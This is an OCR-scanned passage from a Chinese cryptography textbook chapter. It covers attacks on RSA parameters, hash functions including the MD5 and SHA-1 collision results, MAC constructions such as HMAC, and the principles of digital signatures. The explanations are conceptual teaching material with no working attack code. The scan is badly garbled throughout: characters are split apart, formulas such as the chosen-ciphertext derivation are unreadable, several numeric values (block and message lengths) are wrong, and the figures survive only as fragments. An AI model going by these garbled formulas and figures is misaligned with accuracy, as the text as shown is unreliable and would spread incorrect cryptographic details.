来 代替 随机 数 d。 因 为 模 指 运算 的 时 间 是 logsd 的 线性 函数 ,小 的 & 能 提高 大 约 10 倍 的 


运算 速度 (n 为 1024 比特 的 模 数 ) 。 不 幸 的 是 ,根据 M. Wiener 的 理论 , 当 ed 


时 ,攻击 者 能 够 由 (z,e) 恢 复 私 钥 d, 从 而 攻破 整个 系统 。Boneh 和 Durfee 的 研究 结果 表 
明 , 当 qd 一 加 也 时 ,攻击 者 能 够 由 (ze) 恢 复 d,Wiener 的 边界 是 不 紧密 的 。 正 确 的 边界 似 
平 应 该 是 dn” ,但 是 这 是 一 个 开放 问题 ,现在 还 未 得 到 证 明 。 
(4) 低 加 密 指 数 攻击 。 为 了 降低 加 密 或 签名 验证 的 时 间 , 人 们 通常 采用 小 的 公 钥 e。 
最 小 可 能 的 公 钥 为 3 ,推荐 采用 65537。 但 是 若 e 选择 的 太 小 , 则 容易 受到 攻击 。 如 果 采 
用 不 同 的 RSA 公 钥 及 相同 的 e 值 ,对 大 于 e(e 十 1)72 个 线性 相关 的 消息 加 密 , 存 在 一 种 
有 效 的 攻击 方法 。 我 们 可 以 在 加 密 前 用 随机 数 填充 消息 来 抵抗 这 种 攻击 。 
(5) 选择 密 文 攻击 。 如 果 攻 击 者 获得 了 一 个 用 A 的 公 钥 加 密 的 消息 密 文 c, 攻 击 者 
可 以 通过 下 面 的 方法 获得 c 所 对 应 的 明文 m: 
攻击 者 首先 选择 一 个 随机 数 r(r 二 n) ;得 到 A 的 公 钥 e, 然 后 计算 : 
r=rmodn 和 y= x modn 
车 攻击 者 让 A 用 私 钥 对 消息 > 进行 签名 , 即 计算 : 
& 一 ye modn 
攻击 者 得 到 vw 后 ,可 通过 计算 : m 二 wu/r mod n 来 获得 明文 m。 
这 是 因为 
u ys (zc)4 Tad X 了 
r r r 
由 此 可 见 ,RSA 算法 并 不 抵抗 选择 密 文 攻击 。 
关于 RSA 算法 的 很 多 种 攻击 并 不 是 因为 算法 本 身 存在 缺陷 ,而 是 由 于 参数 选择 不 当 
造成 的 ,为 保证 算法 足够 安全 ,参数 需 满足 下 面 几 个 基本 要 求 : 要 选择 足够 大 的 素数 p、 
gq, 使 得 |p 一 gq| 较 大 ,上 且 (p 一 1) 和 (g 一 1) 没 有 小 的 素 因 子 。 为 加 密实 现 方 便 ,通常 选择 小 
的 加 密 指数 e 且 与 pg (nw) 互 素 , 此 时 解密 指数 会 较 大 。 使 用 时 不 同 用 户 不 共用 模 数 , 且 系 
统 不 能 随意 对 信息 解密 (签名 ) 。 


m modn 


4.4 Hash 函数 与 消息 认证 


随 着 网 络 应 用 的 不 断 发 展 , 信 息 安 全 除了 要 保障 信息 的 机 密 性 外 ,还 要 保障 信息 在 存 
储 、 使 用 、 传 输 过 程 中 不 被 非法 算 改 , 即 信息 的 完整 性 。Hash 函数 可 以 将 “任意 长 度 ” 的 
输入 经 过 变换 以 后 得 到 固定 长 度 的 输出 ,也 称 为 消息 摘要 。 消 息 摘要 能 够 用 于 完成 消息 


\@/ 
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的 认证 功能 ,消息 认证 是 保证 信息 完整 性 的 重要 措施 。 
441 Hesh 函数 的 基本 概念 和 原理 


Hash 函数 也 称 散 列 函 数 、 哈 希 函 数 、 杂 凑 函 数 等 ,是 密码 学 的 一 个 重要 分 支 。Hash 
函数 可 以 看 作 是 一 种 单 向 密码 体制 , 即 它 是 一 个 从 明文 到 密 文 的 不 可 逆 映 射 , 即 只 有 加 密 
过 程 , 不 能 解密 。 

Hash 函数 的 这 种 单 向 特征 和 输出 数据 长 度 固定 的 特征 使 得 它 可 以 生成 消息 或 其 他 
数据 块 的 “数据 指纹 ”( 也 称 消息 摘要 或 Hash 值 ) ,因此 在 消息 认证 和 数字 签名 等 领域 有 
广泛 的 应 用 。 一 般 地 ,Hash 值 的 生成 过 程 可 以 表示 为 4 二 HC(M), 其 中 M 是 “任意 "长 度 
的 消息 ,H 是 Hash 函数 ,h 是 固定 长 度 的 Hash 值 。 

Hash 函数 应 用 于 消息 认证 时 ,生成 的 Hash 值 作为 消息 的 认证 符 , 要 求 其 可 以 抵抗 
攻击 ,要 使 Hash 值 可 以 代表 消息 原文 ,必须 具有 以 下 性 质 : 

(1) H 可 以 用 于 “任意 ”长 度 的 消息 。“ 任 意 ” 是 指 实际 存在 的 。 

(2) H 产生 的 Hash 值 是 固定 长 度 的 。 这 是 Hash 函数 的 基本 性 质 。 

(3) 对 于 任意 给 定 的 消息 xz, 容易 计算 H(zx) 值 。 这 是 要 求 Hash 函数 的 可 用 性 。 

(4) 单 向 性 (抗原 像 性 ): 对 于 给 定 的 Hash 值 , 要 找到 M 使 得 HOM)==h 在 计算 上 
是 不 可 行 的 。 

(5) 抗 弱 碰撞 性 ( 抗 第 二 原 像 性 ) : 对 于 给 定 的 消息 Mi ,要 发 现 另 一 个 消息 Ms ,满足 
HCM) 王 HGCM:) 在 计算 上 是 不 可 行 的 。 

(6) 抗 强 碰撞 性 : 找 任意 一 对 不 同 的 消息 Mi 、M; ,使 HCOM )=HCM: ) 在 计算 上 是 不 
可 行 的 。 

(7) 消息 对 应 Hash 值 的 每 一 比特 应 与 消息 的 每 一 个 比特 有 关联 。 当 消息 原文 发 生 
改变 时 , 求 得 的 消息 摘要 必须 相应 的 变化 。 

到 目前 为 止 , Hash 函数 的 设计 主要 分 为 两 类 : 一 类 是 基于 加 密 体制 实现 的 ,例如 使 
用 对 称 分 组 密码 算法 的 CBC 模式 来 产生 Hash 值 ; 另 一 类 是 直接 构造 复杂 的 非 线 性 关系 
实现 单 向 性 ,后 者 是 目前 使 用 较 多 的 设计 方法 。 

Hash 函数 的 一 般 结构 如 图 4-18 所 示 , 称 为 迭代 Hash 函数 结构 。 图 中 IV 表示 初始 
值 ,L 为 输入 分 组 数 ,CV; 为 链接 变量 ,n 为 Hash 值 的 长 度 ,M; 为 第 i 个 输入 分 组 ,6b 是 输 
入 分 组 的 长 度 ,f 是 压缩 函数 。 


CV 


图 4-18 Hash 函数 的 一 般 结构 
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Hash 函数 结构 是 由 Merkle 和 Damgird 分 别 独立 提出 的 ,包括 MD5、SHAI1 等 目前 
所 广泛 使 用 的 大 多 数 Hash 气 数 都 采用 这 种 结构 。Hash 函数 将 输入 消息 分 为 个 固定 
长 度 的 分 组 ,每 一 分 组 长 为 6 位 ,最 后 一 个 分 组 包含 输入 消息 的 总 长 度 , 若 最 后 一 个 分 组 
不 足 65 位 时 ,需要 进行 填充 。 由 于 输入 包含 消息 的 长 度 , 所 以 攻击 者 必须 找 出 具有 相同 散 
列 值 且 长 度 相 等 的 两 条 消息 ,或 者 找 出 两 条 长 度 不 等 但 加 入 消息 长 度 后 散 列 值 相同 的 消 
息 ,从 而 增加 了 攻击 的 难度 。 

该 散 列 算法 迭代 使 用 一 个 压缩 函数 ,压缩 函数 f 有 两 个 输入 : 一 个 是 前 一 次 迭代 
的 位 输出 , 称 为 链接 变量 ; 另 一 个 来 源 于 消息 的 5 位 分 组 ,并 产生 一 个 位 的 输出 。 第 
一 次 迭代 输入 的 链接 变量 又 称 为 初 值 变 量 , 由 算法 在 开始 时 指定 ,最 后 一 次 迭代 的 输出 即 
为 Hash 值 。 因 为 一 般 来 说 消息 长 度 b 大 于 输出 长 度 n, 因 此 也 称 之 为 压缩 函数 。 

设计 无 碰撞 的 压缩 函数 f, 而 攻击 者 对 算法 的 攻击 重点 是 压缩 函数 f 的 内 部 结构 ,由 
于 压缩 函数 f 和 分 组 密码 一 样 是 由 若干 轮 处 理 过 程 组 成 ,所 以 对 压缩 函数 f 的 攻击 需 通 
过 对 各 轮 之 间 的 位 模式 分 析 来 进行 ,分 析 过 程 常常 需要 先 找 出 压缩 函数 了 的 碰撞 。 由 于 
是 压缩 函数 ,其 碰撞 是 不 可 避免 的 。 因 此 ,在 设计 压缩 函数 f 时 就 应 保证 找 出 其 碰撞 在 
计算 上 是 不 可 行 的 。 
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Hash 算法 中 比较 著名 的 是 MD 系列 和 SHA 系列 。MD 系列 是 在 20 世纪 90 年 代 初 
由 Rivest 设计 的 ,MD 代表 消息 摘要 (Message Digest), MD2(1989)、MD4(1990) 和 MD5 
(1991) 都 产生 一 个 128 位 的 信息 摘要 。SHA 系列 算法 是 NIST 根据 Rivest 设计 的 MD4 
和 MD5 开发 的 算法 ,国家 安全 局 发 布 SHA 作为 美国 政府 标准 , SHA (Secure Hash 
Algorithm) 表 示 安 全 散 列 算法 。 

1. MD 系列 介绍 

原始 的 MD 算法 从 未 公开 发 表 过 ,第 一 个 公开 发 表 的 是 MD2, 接 下 来 是 MD4 和 
MD5。Rivest 在 1989 年 开发 出 MD2 算法 。 在 这 个 算法 中 ,首先 对 信息 进行 数据 补 位 ， 
使 信息 的 字 节 长 度 是 16 的 倍数 。 然 后 ,以 一 个 16 位 的 检验 和 追加 到 信息 末尾 ,并 且 根 据 
这 个 新 产生 的 信息 计算 出 散 列 值 。 

为 了 加 强 算法 的 安全 性 ,Rivest 在 1990 年 又 开发 出 MD4 算法 。MD4 算法 同样 需要 
填补 信息 以 确保 信息 的 比特 位 长 度 减 去 448 后 能 被 512 整除 (信息 比特 位 长 度 mod 
512 一 448) 。 然 后 ,一 个 以 64 位 二 进 制 表示 的 信息 的 最 初 长 度 被 添加 进来 。 信 息 被 处 理 
成 512 位 迭代 结构 的 区 块 ,而 且 每 个 区 块 要 通过 三 个 不 同步 骤 的 处 理 。 研 究 人 员 很 快 发 
现 了 攻击 MD4 版 本 中 第 一 步 和 第 三 步 的 漏洞 ,并 向 大 家 演示 了 如 何 利用 一 部 普通 的 个 
人 计算 机 在 几 分 钟 内 找到 MD4 的 碰撞 (不 同 的 内 容 进行 加 密 却 可 能 得 到 相同 的 加 密 后 
结果 ) 。 

于 是 ,1991 年 Rivest 对 MD4 进行 改进 并 设计 了 MD5 算法 ,图 4-19 为 MD5 运算 示 
意图 。MD5 算法 比 MD4 算法 复杂 ,并 且 速 度 较 MD4 快 了 近 30% ,但 在 抗 安全 分 析 方面 
表现 更 好 ,因此 在 实际 应 用 中 受到 欢迎 。 

2004 年 8 月 17 日 的 美国 加 州 圣 巴巴 拉 国 际 密码 学 会 议 (Crypto"2004) 上 ,山东 大 学 
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图 4-19 MDS5 运算 流程 


的 王小云 教授 做 了 破译 MD5、HAVAL-128、MD4 和 RIPEMD 算法 的 报告 ,公布 了 MD 
系列 算法 的 破解 结果 ,宣告 了 固 若 金汤 的 世界 通行 密码 标准 MD5 的 堡垒 稻 然 倒塌 ,引发 
了 密码 学 界 的 轩然大波 。 

2. SHA 算法 介绍 

美国 国家 标准 技术 研究 所 NIST 于 1993 年 开发 的 另 一 个 Hash 算法 称 为 SHA。 两 
年 之 后 ,这 个 算法 被 修改 为 了 今天 广泛 使 用 的 形式 。 修 改 后 的 版 本 是 SHA-1, 是 数字 签 
名 标准 中 要 求 使 用 的 算法 。 

SHA 接受 任何 有 限 长 度 的 输入 消息 ,并 产生 长 度 为 160 比特 的 Hash 值 (MD5 仅仅 
生成 128 位 的 摘要 ) ,因此 抗 穷 举 性 更 好 。SHA-1 设计 时 基于 和 MD4 相同 的 原理 , 它 有 5 
个 参与 运算 的 32 位 寄存 器 ,消息 分 组 和 填充 方式 与 MD5 相同 , 主 循环 也 同样 是 4 轮 , 但 
每 轮 进行 20 次 操作 , 非 线 性 运算 、 移 位 和 加 法 运算 也 与 MD5 类 似 , 但 非 线 性 函数 、 加 法 常 
数 和 循环 左 移 操作 的 设计 有 一 些 区 别 。 

美国 国家 标准 技术 研究 所 2008 年 对 国家 标准 进行 更 新 ,其 中 规定 了 SHA-1、SHA- 
224、SHA-256 .SHA-384 和 SHA-512 这 几 种 单 向 散 列 算法 。SHA-1、SHA-224 和 SHA- 
256 适用 于 长 度 不 超过 2% 二进制 位 的 消息 。SHA-384 和 SHA-512 适用 于 长 度 不 超过 
23 二 进 制 位 的 消息 。 

在 MD5 被 王小云 教授 为 代表 的 中 国 专 家 破译 之 后 ,世界 密码 学 界 仍然 认为 SHA-1 
是 安全 的 。2005 年 2 月 7 日 ,美国 国家 标准 技术 研究 院 发 表 声明 ,SHA-1 没有 被 攻破 ,并 
且 没 有 足够 的 理由 怀疑 它 会 很 快 被 攻破 ,开发 人 员 在 2010 年 前 应 该 转向 更 为 安全 的 
SHA-256 和 SHA-512 算法 。 而 仅仅 在 一 周 之 后 ,王小云 教授 就 宣布 了 破译 SHA-1 的 
消息 。 

因为 SHA-1 在 美国 等 国家 有 更 加 广泛 的 应 用 ,密码 被 破 的 消息 一 出 ,在 国际 社会 的 
反响 可 谓 石破天惊 。 换 名 话说 ,王小云 教授 的 研究 成 果 表 明了 从 理论 上 讲 电子 签名 可 以 
伪造 ,必须 及 时 添加 限制 条 件 ,或 者 重新 选用 更 为 安全 的 密码 标准 ,以 保证 电子 商务 的 
安全 。 

对 于 Hash 函数 ,攻击 者 的 主要 目标 不 是 恢复 原始 的 明文 ,而 是 用 非法 消息 替代 合法 
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消息 进行 伪造 和 欺骗 ,对 Hash 函数 的 攻击 也 是 寻找 碰撞 的 过 程 。Hash 函数 比较 常见 的 
攻击 方法 有 生日 攻击 .比特 追踪 法 、 模 差分 方法 等 。 
443 消息 认证 技术 

消息 认证 的 目的 主要 包括 : 验证 信息 来 源 的 真实 性 和 验证 消息 的 完整 性 。 消 息 认 证 
码 (Messages Authentication Codes, MAC) 是 一 种 重要 的 消息 认证 技术 , 它 利 用 消息 和 双 
方 共享 的 密 钥 通过 认证 函数 来 生成 一 个 固定 长 度 的 短 数据 块 ,并 将 该 数据 块 附 在 消息 后 
(如 图 4-20)。 消 息 认证 码 是 与 密 钥 相 关 的 Hash 函数 ,也 称 消息 鉴别 码 。 消 息 认 证 码 与 
Hash 函数 类 似 ,都 具有 单 向 性 ,此 外 消息 认证 码 还 包括 一 个 密 钥 。 不 同 的 密 钥 会 产生 不 
同 的 Hash 函数 ,这 样 就 能 在 验证 发 送 者 的 消息 没有 经 过 算 改 的 同时 ,验证 是 由 哪 一 个 发 
送 者 发 送 的 。 


1 1 | 

| 发 送 方 | 站 搜 权 方 | 
| 消息 | i Tt 
| ! 1 | 
| 消息 | | | 消息 | [消息 摘要 | 
| en | | iB i | | i | 
| | > 
1 | 1 1 
| 1 | | 是 | 无 族 ] | 
| 消息 接 要 | | 有 效 | 
1 1 1 | 


图 4-20 消息 认证 码 的 实现 过 程 


MAC 算法 与 加 密 算法 类 似 ,不 同 之 处 为 MAC 不 必 是 可 道 的 (一 般 为 多 到 一 的 映 
射 ), 因 此 与 加 密 算法 相 比 更 不 易 被 攻破 。 上 述 过 程 中 ,由 于 消息 本 身 在 发 送 过 程 中 是 明 
文 形式 ,所 以 这 一 过 程 只 提供 认证 性 而 未 提供 保密 性 。 为 提供 保密 性 可 在 生成 MAC 之 
后 或 之 前 进行 一 次 加 密 ,而 且 加 密 密 钥 也 需 被 收发 双方 共享 。 通 常 希望 直接 对 明文 进行 
认证 ,因此 先 计算 MAC 再 加 密 的 使 用 方式 更 为 常用 。 

生成 消息 认证 码 的 方法 主要 包括 基于 加 密 函 数 的 认证 码 和 基于 Hash 的 认证 码 。 

1. 基于 DES 的 消息 认证 码 

美国 国家 标准 技术 研究 所 (National Institute of Standards and Technology) 于 1985 
年 5 月 30 日 发 布 了 《计算 机 信息 认证 标准 》(Federal Information Processing Standards 
Publication 113,FIPS PUB 113) ,这 个 标准 制定 了 一 个 基于 DES 的 数据 认证 算法 (Data 
Authentication Algorithm,DAA)。 数 据 认证 算法 是 最 为 广泛 使 用 的 消息 认证 码 中 的 一 
个 ,已 作为 FIPS Publication(FIPS PUB 113) 并 被 ANSI(American National Standards 
Institute) 作 为 X. 917 标准 。 

数据 认证 算法 采用 DES 运算 的 密 文 分 组 链接 (CBC) 方 式 , 其 初始 向 量 IV 为 零 ,需要 
认证 的 数据 (如 消息 、 记 录 、 文 件 和 程序 等 ) 分 成 连续 的 64 位 的 分 组 Di ,D: ,…',Dx, 若 最 
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后 分 组 不 足 64 位 ,可 在 其 后 填充 0 直至 成 为 64 位 的 分 组 。 利 用 DES 加 密 算法 和 密 钥 ， 
计算 数据 认证 码 的 过 程 如 图 4-21 所 示 。 经 过 对 所 有 数据 分 组 进行 处 理 后 形成 最 后 一 块 
密 文 Oy ,消息 认证 码 可 以 是 整个 64 位 的 Ov ,也 可 以 是 Ow 最 左边 的 m 位 ,16 夺 m 夺 64。 


第 1 次 第 2 次 第 N 次 
Di D; DN 
1 Oy 
一 [下 = 
_ 密 阴 DES 加密 _ 密 钥 _「DES 加 密 ] ------ 密 钥 _[pEs 加 密 


上 
| 1 
0,|---! Ow 


图 4-21 基于 数据 认证 算法 流程 


2. 基于 Hash 的 消息 认证 码 

利用 对 称 分 组 密码 体制 (如 DES、AES) 的 密码 分 组 链接 模式 (CBC) 一 直 是 构造 
MAC 的 最 常见 方法 。 近 几 年 ,人 们 越 来 越 感 兴趣 于 利用 哈 希 函数 来 设计 MAC, 这 是 因 
为 像 MD5、SHA-1 这 样 的 Hash 函数 ,其 软件 执行 速度 比 诸如 DES、AES 这 样 的 对 称 分 
组 密码 要 快 。 

然而 ,诸如 SHA-1 这 样 的 哈 希 函数 并 不 是 专门 为 MAC 设计 的 ,由 于 Hash 函数 不 依 
赖 于 密 钥 ,所 以 它 不 能 直接 用 于 计算 MAC。 目前 ,已 经 提出 了 许多 方案 将 密 钥 加 到 现 有 
的 Hash 函数 中 ,其 中 HMAC 是 最 受 支持 的 方案 ,并 且 在 Internet 协议 中 (如 SSL) 中 有 
应 用 。 

HMAC 的 实现 过 程 如 图 4-22 所 示 。 


K+ ipad 


| b 位 b 位 4 位 
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位 H(SIIM) 
1 填充 至 b 位 


So 


! 
ew ] 
TIV 一 一 一 | 函数 ———~— HMAC(K,M) 


图 4-22 HMAC 算法 实现 过 程 


其 中 ,H 是 一 个 嵌入 的 Hash 函数 ;n 表示 Hash 值 的 长 度 ;K 表示 密 钥 ,一 般 K 的 长 
度 不 小 于 ”, 当 使 用 长 度 大 于 的 密 钥 时 , 先 用 H 对 密 钥 进行 计算 ,计算 结果 作为 HMAC 


第 4 章 密码 学 


的 真正 密 钥 ;K+ 表示 左边 经 填充 0 后 的 人 ,K+ 的 长 度 为 2 比特 ;L 表示 M 中 的 分 组 数 ;6 
表示 每 个 分 组 包含 的 比特 数 ;IV 表示 初始 链接 变量 ;ipad 表示 0x36 重复 0/8 次 ,opad 表 
示 0x5c 重 复 5/8 次 。 由 此 可 知 ,HMAC 可 表述 为 

HMAC(K,M) = H[(K*@ opad) | H[(K*® ipad) | M]] 

需要 强调 的 是 K+ 与 ipad 异 或 运算 后 ,其 信息 位 有 一 半 发 生变 化 ;同样 ,K+ 与 opad 
异 或 后 ,其 信息 位 也 有 一 半 发 生 了 变化 。 这 两 部 分 首先 参与 Hash 运算 ,因此 可 以 对 其 进 
行 预计 算 , 从 而 提高 执行 效率 。 

HMAC 的 密 钥 长 度 可 以 是 任意 长 度 ,最 小 推荐 长 度 为 n 位 ,因为 小 于 位 时 会 显著 
降低 函数 的 安全 性 ,大 于 位 也 不 会 增加 安全 性 。 密 钥 应 该 随机 选取 ,或 者 由 密码 性 能 良 
好 的 伪 随 机 数 产生 器 生成 , 且 需 定期 更 新 。 但 如 果 密 钥 的 随机 性 不 好 , 则 应 当 使 用 较 长 的 
密 钥 。 


4.5 数字 签名 技术 


数字 签名 (Digital Signature) 主 要 用 于 对 数字 消息 进行 签名 ,以 防 消息 的 冒名 伪造 或 
算 改 , 亦 可 以 用 于 通信 双方 的 身份 鉴别 。 数 字 签 名 具有 身份 认证 、 数 据 完整 性 、 不 可 否认 
性 及 匿名 性 等 方面 的 特点 。 随 着 计算 机 通信 网 络 的 迅速 发 展 ,特别 是 在 大 型 网 络 安全 通 
信 中 的 密 钥 分 配 、 认 证 及 电子 商务 系统 中 ,数字 签名 的 使 用 越 来 越 普遍 ,数字 签名 是 防止 
信息 欺诈 行为 的 重要 措施 。 


451 数字 签名 的 特点 和 功能 


数字 签名 是 电子 信息 技术 发 展 的 产物 ,是 针对 电子 文档 的 一 种 签名 确认 方法 ,在 数字 
系统 中 同样 有 签名 应 用 的 需求 ,如 假定 A 发 送 一 个 认证 的 信息 给 B, 如 果 没 有 签名 确认 
的 措施 ,B 可 能 伪造 一 个 不 同 的 消息 ,但 声称 是 从 A 收 到 的 ;或 者 为 了 某 种 目的 ,A 也 可 
能 否认 发 送 过 该 消息 。 很 显然 ,数字 系统 的 特点 决定 了 不 可 能 再 沿用 原先 的 手写 签名 方 
法 来 实现 防伪 造 或 抵赖 ,这 就 提出 了 如 何 实现 数字 签名 的 问题 。 

就 签名 的 本 质 而 言 ,需要 具有 以 下 特点 : 

(1) 不 可 否认 性 : 必须 可 以 通过 签名 来 验证 消息 的 发 送 者 、 签 名 日 期 和 时 间 。 

(2) 不 可 抵赖 性 : 必须 可 以 通过 签名 对 所 签署 消息 的 内 容 进行 认证 。 

(3) 可 仲裁 性 : 必须 可 以 由 第 三 方 通过 验证 签名 来 解决 争端 。 

但 在 复杂 而 虚拟 的 网 络 环境 中 ,数字 签名 与 手写 签名 还 存在 不 同 之 处 , 且 很 多 方面 是 
手写 签名 很 难 达 到 的 。 

首先 ,签名 的 对 象 不 同 。 手 写 签名 的 对 象 是 纸 质 的 文件 ,而 数字 签名 的 对 象 是 传输 在 
网 络 中 的 数字 信息 ,是 肉眼 不 可 读 的 。 

其 次 ,实现 的 方法 不 同 。 手 写 签名 是 将 一 串 字符 串 附 加 在 文件 上 ,数字 签名 则 是 对 整 
个 消息 进行 某 种 运算 。 这 一 点 在 防 自 改 方面 就 凸显 出 数字 签名 的 优势 。 数 字 签 名 与 文件 
成 为 一 个 整体 ,任何 改动 都 会 对 整个 签名 结果 产生 影响 ,从 而 免 去 了 手写 签名 需要 对 文件 
的 每 一 页 进行 手 签 的 烦琐 劳动 。 因 此 数字 签名 技术 可 以 更 有 效 地 防止 文件 的 算 改 。 
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再 次 ,验证 的 方式 不 同 。 手 写 签名 的 验证 是 通过 和 一 个 已 有 的 签名 进行 对 比 ,而 模仿 
他 人 签名 不 是 一 件 极其 困难 的 事情 ,所 以 它 的 安全 性 得 不 到 有 效 的 保证 。 数 字 签 名 的 验 
证 则 是 通过 一 种 公开 的 验证 算法 对 签名 进行 计算 ,任何 不 一 致 都 会 被 发 现 ,因此 具有 很 高 
的 安全 性 。 

最 后 ,在 保证 机 密 性 方面 ,数字 签名 比 手写 签名 更 具有 优势 。 因 为 数字 签名 可 以 实现 
对 文件 的 加 密 , 这 样 文件 内 容 的 机 密 性 就 得 到 了 保证 ,而 手工 签名 很 难 实现 这 一 点 。 

数字 签名 是 手写 签名 的 数字 模拟 ,但 这 种 模拟 不 是 简单 的 替代 ,尤其 是 当 发 送 方 和 接 
收 方 互相 不 完全 信任 的 时 候 。 数 字 签 名 在 许多 方面 比 手 写 签名 更 具有 安全 性 。 因 此 数字 
签名 在 电子 政务 .电子 商务 等 重要 场合 中 发 挥 着 不 可 估量 的 作用 。 

综 上 所 述 , 可 以 总 结 出 一 个 数字 签名 应 具有 以 下 功能 : 

(1) 采用 公 钥 的 数字 签名 技术 可 以 防范 信息 伪造 。 由 于 私 钥 由 签名 者 秘密 保管 ,所 
以 由 该 私 钥 进行 签名 的 文件 可 以 表示 该 签名 者 的 身份 ,任何 其 他 人 都 不 可 能 正确 地 伪造 
出 该 签名 结果 。 

(2) 在 防范 信息 算 改 方面 ,数字 签名 比 手工 签名 更 具有 优势 。 假 如 有 一 份 上 百 页 的 
文件 需要 签署 ,为 了 保证 文件 不 被 算 改 ,需要 在 文件 的 每 一 页 上 进行 签署 ,显然 这 样 做 很 
烦琐 。 数 字 签 名 技术 使 用 户 签名 与 文件 成 为 一 个 整体 ,任何 改动 都 会 对 签名 结果 产生 影 
响 。 因 此 数字 签名 技术 可 以 更 有 效 地 防止 文件 的 算 改 。 

(3) 在 防范 信息 重 放 方面 ,数字 签名 具有 很 重要 的 作用 。 例 如 ,在 债务 方面 ,数字 签 
名 可 以 防止 债主 重复 利用 一 张 收据 对 借款 人 进行 勒索 。 因 为 数字 签名 可 以 利用 对 借条 添 
加 流水 账号 和 时 间 戳 等 技术 来 有 效 防 止 重 放 攻击 。 

(4) 数字 签名 可 以 有 效 防 止 签 名 者 抵赖 曾经 签署 过 文件 ,从 而 实现 防范 抵赖 。 同 时 
也 要 有 相关 措施 防止 接收 者 抵赖 已 经 接收 到 了 文件 。 可 以 要 求 接收 者 回 送 一 个 报 文 表明 
收 到 了 文件 ,或 者 引入 第 三 方 仲裁 机 制 。 这 样 收发 双方 都 无 法 抵赖 曾经 发 送 或 者 接收 过 
文件 。 

数字 签名 作为 信息 安全 技术 的 基本 工具 , 它 在 网 络 安全 ,包括 身份 认证 ,数据 完整 性 、 
不 可 否认 性 等 方面 有 着 重要 应 用 。 


452 数字 签名 的 原理 


数字 签名 由 公 钥 密码 发 展 而 来 ,与 加 密 的 不 同 之 处 在 于 : 消息 加 密 和 解密 可 能 是 一 
次 性 的 , 它 要 求 在 解密 之 前 是 安全 的 ;而 一 个 签字 的 消息 可 能 作为 一 个 法 律 上 的 文件 ,如 
合同 等 ,很 可 能 在 对 消息 签署 多 年 之 后 才 验 证 其 签字 , 且 可 能 需要 多 次 验证 此 签字 。 

数字 签名 的 目的 是 提供 一 种 手段 ,使 得 一 个 实体 把 他 的 身份 与 某 个 信息 捆绑 在 一 起 。 
一 个 消息 的 数字 签名 实际 上 是 一 个 数 , 它 依赖 于 签名 者 知道 的 某 个 秘密 ,也 依赖 于 被 签名 
信息 的 本 身 。 数 字 签 名 基于 两 条 基本 的 假设 : 一 是 私 钥 是 安全 的 ,只 有 其 拥有 者 才能 获 
得 ;二 是 产生 数字 签名 的 唯一 途径 是 使 用 私 钥 。 

数字 签名 体制 又 称 为 数字 签名 方案 ,一 般 由 两 部 分 组 成 , 即 签名 算法 和 验证 算法 。 签 
名 算法 或 签名 密 钥 是 由 签名 者 秘密 保有 的 ,而 验证 算法 或 验证 密 钥 应 当 公 开 , 以 方便 他 人 
进行 验证 。 一 般 来 讲 , 数 字 签 名 方案 包括 三 个 过 程 : 系统 的 初始 化 过 程 、 签 名 生成 过 程 和 


第 4 章 密码 学 


签名 验证 过 程 。 

在 系统 的 初始 化 过 程 中 ,需要 产生 数字 签名 所 需要 的 基本 参数 ,包括 秘密 的 参数 和 公 
开 的 参数 。 这 些 基 本 参数 为 (M,S,K,SIG,VER), 其 中 ,M 代表 明文 空间 ,S 代表 签名 空 
间 ,K 代表 密 钥 空间 ,SIG 为 签名 算法 集合 ,VER 为 验证 算法 集合 。 

在 签名 生成 过 程 中 ,用 户 利用 某 种 特定 的 算法 对 消息 进行 签名 从 而 产生 签名 消息 ,这 
种 签名 方案 可 以 是 公开 的 也 可 以 是 私密 的 。 该 过 程 主要 包含 两 个 步 又 : 第 一 ,选取 密 钥 ; 
第 二 ,计算 消息 摘要 ,并 对 该 摘要 进行 签名 。 

在 签名 验证 过 程 中 ,验证 者 利用 公开 的 验证 方法 对 消息 签名 进行 验证 ,从 而 判断 签名 
的 有 效 性 。 首 先 ,验证 者 获得 签名 者 的 可 信 公 钥 ; 然 后 ,根据 消息 产生 摘要 并 对 该 摘要 利 
用 验证 算法 进行 验证 ;最 后 ,比较 由 验证 算法 计算 出 的 消息 与 原始 消息 是 否 一 致 , 若 一 致 
则 该 签名 为 有 效 ,否则 ,签名 无 效 。 

数字 签名 在 具体 实施 过 程 中 ,发 送 方 对 信息 进行 数学 变换 ,使 所 得 信息 与 原始 信息 唯 
一 地 对 应 ;接收 方 进行 逆 变 换 , 得 到 原始 信息 。 只 要 数学 变换 优良 ,变换 后 的 信息 在 传输 
过 程 中 就 具有 很 强 的 安全 性 ,可 以 有 效 地 防止 干扰 者 的 破译 和 算 改 。 该 数学 变换 过 程 就 
是 签名 过 程 ,通常 对 应 某 种 加 密 措 施 ;而 在 接收 方 的 逆 变 换 过 程 为 验证 过 程 ,通常 对 应 某 
种 解密 措施 (如 图 4-23 所 示 ) 。 


消息 m 和 | =Sigwm) 


私 钥 sk 公共 信 信 道 


4-23 数字 签名 原理 与 过 程 


在 传递 签名 时 ,通常 要 把 签名 附 在 原始 消息 之 后 一 起 传送 给 接收 者 。 为 了 使 签名 方 
案 在 实际 中 便于 使 用 ,要 求 它 的 每 一 个 签名 算法 Sigs E SIG 和 验证 算法 VerwE VER 都 
是 多 项 式 时 间 的 算法 。 

对 于 数字 签名 技术 在 实现 时 还 需要 满足 以 下 要 求 : 

(1) 签名 的 产生 必须 使 用 签名 者 独 有 的 一 些 信 息 以 防伪 造 和 否认 ,同时 ,要 求 保证 独 
有 信息 的 安全 性 。 

(2) 签名 的 产生 应 较为 容易 。 

(3) 签名 的 识别 和 验证 应 较为 容易 。 

(4) 对 已 知 的 数字 签名 构造 一 新 的 消息 或 对 已 知 的 消息 构造 一 假冒 的 数字 签名 在 计 
算 上 都 是 不 可 行 的 。 
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453 典型 的 数字 签名 体制 


实现 数字 签名 有 很 多 种 方法 ,基于 对 称 密码 体制 ,也 可 以 依靠 其 共享 密 钥 的 保密 性 来 
实现 数字 签名 ,但 其 使 用 范围 受到 局 限 。 目 前 数字 签名 多 数 还 是 利用 公 钥 密码 体制 来 设 
计 的 。 

1. 基于 RSA 的 签名 方案 

RSA 签名 方案 是 目前 使 用 较 多 的 一 个 签名 方案 ,也 是 已 经 提出 的 数字 签名 方案 中 最 
容易 理解 和 实现 的 签名 方案 , 它 的 安全 性 是 基于 大 整数 因子 分 解 的 困难 性 。 下 面 阐 述 
RSA 签名 方案 的 实现 过 程 。 

1) 系统 初始 化 

